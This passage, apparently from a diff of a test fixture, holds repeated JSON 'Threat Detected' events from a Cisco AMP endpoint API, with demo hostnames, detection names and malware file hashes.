Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 